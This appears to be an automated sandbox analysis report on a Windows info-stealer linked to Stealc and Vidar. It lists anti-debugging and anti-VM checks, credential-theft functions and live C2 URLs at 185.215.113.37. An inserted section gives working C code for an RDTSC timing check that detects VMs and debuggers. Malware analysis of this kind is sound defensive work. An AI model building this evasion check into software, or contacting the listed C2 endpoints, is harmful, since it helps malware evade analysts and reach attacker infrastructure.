                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A3191 second address: 12A3197 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A3197 second address: 12A31D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7ADCB968CBh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jg 00007F7ADCB968C6h 0x00000014 jl 00007F7ADCB968C6h 0x0000001a jmp 00007F7ADCB968CEh 0x0000001f jno 00007F7ADCB968C6h 0x00000025 popad 0x00000026 pushad 0x00000027 jng 00007F7ADCB968C6h 0x0000002d push edx 0x0000002e pop edx 0x0000002f pushad 0x00000030 popad 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A31D9 second address: 12A31DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A3491 second address: 12A3497 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A39CE second address: 12A39D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A39D2 second address: 12A39E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7ADCB968CAh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A69E9 second address: 12A69ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A69ED second address: 12A69F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A6A8A second address: 12A6A94 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F7ADCEF9146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A8066 second address: 12A806A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A806A second address: 12A8070 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A8070 second address: 12A8076 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A8076 second address: 12A808B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7ADCEF914Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A808B second address: 12A8095 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F7ADCB968C6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A8095 second address: 12A80B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F7ADCEF914Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push edx 0x0000000f pop edx 0x00000010 popad 0x00000011 pushad 0x00000012 jc 00007F7ADCEF9146h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A80B7 second address: 12A80C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 js 00007F7ADCB968C6h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51602C5 second address: 51602E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 mov dword ptr [esp], ebp 0x00000009 pushad 0x0000000a push esi 0x0000000b mov bx, 2A20h 0x0000000f pop edx 0x00000010 mov dx, cx 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov dx, 5B50h 0x0000001d mov si, dx 0x00000020 popad 0x00000021 rdtsc
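The "RDTSC instruction interceptor" entries above record each pair of RDTSC reads the packer executes, with the bytes between the first and second address disassembled: push and pop of the same register, pushad/popad, and jmp to the very next instruction. That filler is stack- and register-neutral; its only job is to separate the two reads. The packer then compares the cycle delta against a threshold: on a hypervisor that traps RDTSC, or under a debugger that single-steps, the delta is far larger than on bare metal and the sample can bail out. The sandbox intercepts the pair so that the check does not derail the run. The following is an added illustration, not code from the report or from the sample: the same check written out in C for GCC/clang on x86. The threshold and the number of probes are assumed values, and the non-x86 fallback uses the monotonic clock only so that the file still builds there.

```c
/* Added example, not from the report or the sample: the RDTSC timing check
   that the interceptor entries above describe, for GCC/clang on x86. */
#define _POSIX_C_SOURCE 199309L
#include <stdint.h>
#include <stdio.h>
#include <time.h>

#if defined(__x86_64__) || defined(__i386__)
#include <x86intrin.h>
static uint64_t read_counter(void) { return __rdtsc(); }
#else
/* Assumed fallback so the file still builds on non-x86 hosts: a nanosecond
   clock instead of the cycle counter (this is not what the sample does). */
static uint64_t read_counter(void) {
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (uint64_t)ts.tv_sec * 1000000000ull + (uint64_t)ts.tv_nsec;
}
#endif

/* One probe: rdtsc, stack- and register-neutral filler of the kind the report
   disassembles (push/pop of the same register, pushad/popad, jmp to the next
   instruction), rdtsc. The filler does nothing; it only separates the reads. */
uint64_t probe_once(void) {
    uint64_t t0 = read_counter();
#if defined(__x86_64__)
    __asm__ volatile (
        "lea -128(%%rsp), %%rsp\n\t"   /* step over the SysV red zone before pushing */
        "push %%rax\n\t" "pop %%rax\n\t"
        "push %%rdx\n\t" "pop %%rdx\n\t"
        "jmp 1f\n"
        "1:\n\t"
        "lea 128(%%rsp), %%rsp\n\t"
        ::: "memory");
#elif defined(__i386__)
    __asm__ volatile ("pushal\n\t" "popal\n\t" "jmp 1f\n" "1:\n\t" ::: "memory");
#endif
    uint64_t t1 = read_counter();
    return t1 - t0;
}

/* Minimum over several probes: a single interrupt or context switch cannot
   push a native host over the threshold, which a one-shot check would misread. */
uint64_t min_delta(int probes) {
    uint64_t best = UINT64_MAX;
    for (int i = 0; i < probes; i++) {
        uint64_t d = probe_once();
        if (d < best) best = d;
    }
    return best;
}

/* The packer's decision: a trapped or single-stepped RDTSC costs far more
   than the handful of cycles the filler takes on bare metal. */
int looks_instrumented(uint64_t delta, uint64_t threshold) {
    return delta > threshold;
}

int main(void) {
    const uint64_t threshold = 500;   /* assumed; packers use a few hundred to a few thousand cycles */
    uint64_t d = min_delta(32);
    printf("min rdtsc delta over 32 probes: %llu -> %s\n",
           (unsigned long long)d,
           looks_instrumented(d, threshold) ? "instrumented (VM/debugger suspected)" : "native");
    return 0;
}
```

Build with `gcc -O1 rdtsc_check.c` and run it once on bare metal and once inside the analysis VM. With TSC passthrough the delta stays in the tens of cycles and the check is silent; it fires when the hypervisor traps RDTSC or when a debugger single-steps the filler. The sample uses plain `rdtsc` as the report shows; the instruction is not serializing, so the measured delta is noisy, which is why the minimum over several probes is the more honest reading.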
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 1021BAE instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 11E75BF instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 11C741A instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 124A497 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DD38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00DD38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DD4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00DD4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DCDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00DCDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DCE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00DCE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DD4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00DD4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DCED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00DCED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DC16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00DC16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DCF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00DCF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DD3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00DD3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DCBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00DCBE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DCDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00DCDE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DC1160 GetSystemInfo,ExitProcess,0_2_00DC1160
                Source: file.exe, file.exe, 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1747910507.0000000001690000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWK^
                Source: file.exe, 00000000.00000002.1747910507.000000000160E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware~#m
                Source: file.exe, 00000000.00000002.1747910507.0000000001690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1747910507.0000000001659000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1747910507.000000000160E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13585
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13588
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13605
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13640
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13600
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00DC45C0 VirtualProtect ?,00000004,00000100,00000000 0_2_00DC45C0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00DD9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00DD9860
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00DD9750 mov eax, dword ptr fs:[00000030h] 0_2_00DD9750
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00DD78E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA, 0_2_00DD78E0
                Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: Yara match File source: Process Memory Space: file.exe PID: 7348, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00DD9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_00DD9600
                Source: file.exe, file.exe, 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Program Manager
                Source: C:\Users\user\Desktop\file.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 0_2_00DD7B90
                Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00DD7980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA, 0_2_00DD7980
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00DD7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA, 0_2_00DD7850
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00DD7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA, 0_2_00DD7A30

                Stealing of Sensitive Information

                barindex
                Source: Yara match File source: 0.2.file.exe.dc0000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000000.00000002.1747910507.000000000160E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000003.1705441818.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: file.exe PID: 7348, type: MEMORYSTR
                Source: Yara match File source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Source: Yara match File source: 0.2.file.exe.dc0000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000000.00000002.1747910507.000000000160E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000003.1705441818.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: file.exe PID: 7348, type: MEMORYSTR
                Source: Yara match File source: dump.pcap, type: PCAP
                MITRE ATT&CK matrix, listed per tactic (the count shown in the report for a technique is given in parentheses):

                Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies
                Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless
                Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise
                Execution: Command and Scripting Interpreter (2), Native API (11), At, Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job
                Persistence: DLL Side-Loading (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
                Privilege Escalation: Process Injection (11), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
                Defense Evasion: Masquerading (1), Virtualization/Sandbox Evasion (33), Disable or Modify Tools (11), Process Injection (11), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (3), Software Packing (12), DLL Side-Loading (1)
                Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem
                Discovery: System Time Discovery (2), Security Software Discovery (641), Virtualization/Sandbox Evasion (33), Process Discovery (13), Account Discovery (1), System Owner/User Discovery (1), File and Directory Discovery (1), System Information Discovery (324)
                Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services
                Collection: Archive Collected Data (1), Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking
                Command and Control: Encrypted Channel (2), Ingress Tool Transfer (2), Non-Application Layer Protocol (2), Application Layer Protocol (12), Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol
                Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol
                Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement

                Source | Detection | Scanner | Label
                file.exe | 100% | Avira | TR/Crypt.TPM.Gen
                file.exe | 100% | Joe Sandbox ML |
                No Antivirus matches
                Source | Detection | Scanner | Label
                http://185.215.113.37/ | 100% | URL Reputation | malware
                http://185.215.113.37 | 100% | URL Reputation | malware
                http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware
                http://185.215.113.37/ws | 100% | URL Reputation | malware
                No contacted domains info
                Name | Malicious | Antivirus Detection | Reputation
                http://185.215.113.37/ | true | URL Reputation: malware | unknown
                http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown
                Name | Source | Malicious | Antivirus Detection | Reputation
                http://185.215.113.37/e2b1563c6670f193.php2 | file.exe, 00000000.00000002.1747910507.0000000001667000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/t | file.exe, 00000000.00000002.1747910507.0000000001667000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37 | file.exe, 00000000.00000002.1747910507.000000000160E000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
                http://185.215.113.37/e2b1563c6670f193.php/ | file.exe, 00000000.00000002.1747910507.0000000001659000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/e2b1563c6670f193.php_ | file.exe, 00000000.00000002.1747910507.0000000001659000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/( | file.exe, 00000000.00000002.1747910507.0000000001667000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37e | file.exe, 00000000.00000002.1747910507.000000000160E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/ws | file.exe, 00000000.00000002.1747910507.0000000001667000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
                http://185.215.113.37/e2b1563c6670f193.phpS | file.exe, 00000000.00000002.1747910507.0000000001659000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                               IP | Domain | Country | ASN | ASN Name | Malicious
                               185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                               Joe Sandbox version: 41.0.0 Charoite
                               Analysis ID: 1541350
                               Start date and time: 2024-10-24 18:07:04 +02:00
                               Joe Sandbox product: CloudBasic
                               Overall analysis duration: 0h 3m 11s
                               Hypervisor based Inspection enabled: false
                               Report type: full
                               Cookbook file name: default.jbs
                               Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                               Number of new started processes analysed: 1
                               Number of new started drivers analysed: 0
                               Number of existing processes analysed: 0
                               Number of existing drivers analysed: 0
                               Number of injected processes analysed: 0
                               Technologies:
                               • HCA enabled
                               • EGA enabled
                               • AMSI enabled
                               Analysis Mode: default
                               Analysis stop reason: Timeout
                               Sample name: file.exe
                               Detection: MAL
                               Classification: mal100.troj.evad.winEXE@1/0@0/1
                               EGA Information:
                               • Successful, ratio: 100%
                               HCA Information:
                               • Successful, ratio: 80%
                               • Number of executed functions: 19
                               • Number of non-executed functions: 87
                               Cookbook Comments:
                               • Found application associated with file extension: .exe
                               • Stop behavior analysis, all processes terminated
                               • VT rate limit hit for: file.exe
                              No simulations
                               Match | Associated Sample Name / URL | Detection | Threat Name | Context
                               185.215.113.37 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.37/e2b1563c6670f193.php
                               185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                               185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                               185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                               185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                               185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                               185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                               185.215.113.37 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.37/e2b1563c6670f193.php
                               185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                               185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/
                              No context
                               Match | Associated Sample Name / URL | Detection | Threat Name | Context
                               WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.16
                               WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
                               WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                               WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
                               WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                               WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
                               WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                               WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.16
                               WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
                               WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                              No context
                              No created / dropped files found
                               File type: PE32 executable (GUI) Intel 80386, for MS Windows
                               Entropy (8bit): 7.947492864720479
                               TrID:
                               • Win32 Executable (generic) a (10002005/4) 99.96%
                               • Generic Win/DOS Executable (2004/3) 0.02%
                               • DOS Executable Generic (2002/1) 0.02%
                               • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                               File name: file.exe
                               File size: 1'821'696 bytes
                               MD5: 20a21ec73989a782b2b0243f0ed123ba
                               SHA1: e81022b1710d56722b6f61b61c7d4a798d9dcbba
                               SHA256: 8313f9dad601a181e4ec94751f43c08ae280504db80c68fbb6ff86e26902d38b
                               SHA512: ec49719a1298ed09e256e94dc6b08033aea72630b8fd692a77a6551bbacb5ece8733f01c5972146eacb70c020ff46493ecbe4b895935d3b5b41c14861c18984b
                               SSDEEP: 49152:h+n/JIP2boz0A4dQyXf2xoC4HJs3lePpHLV:h+n/JI+Ez0dTOx6a1eBr
                               TLSH: D085336821EF4576F283A1F1AD11B358CBFE4222C96511956C5F2E2E04A33FE33417BA
                               File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
                               Icon Hash: 90cececece8e8eb0
                               Entrypoint: 0xa8d000
                               Entrypoint Section: .taggant
                               Digitally signed: false
                               Imagebase: 0x400000
                               Subsystem: windows gui
                               Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
                               DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                               Time Stamp: 0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                               TLS Callbacks:
                               CLR (.Net) Version:
                               OS Version Major: 5
                               OS Version Minor: 1
                               File Version Major: 5
                               File Version Minor: 1
                               Subsystem Version Major: 5
                               Subsystem Version Minor: 1
                               Import Hash: 2eabe9054cad5152567f0699947a2c5b
                              Instruction
                              Programming Language:
                              • [C++] VS2010 build 30319
                              • [ASM] VS2010 build 30319
                              • [ C ] VS2010 build 30319
                              • [ C ] VS2008 SP1 build 30729
                              • [IMP] VS2008 SP1 build 30729
                              • [LNK] VS2010 build 30319
                               Name | Virtual Address | Virtual Size | Is in Section
                               IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
                               IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
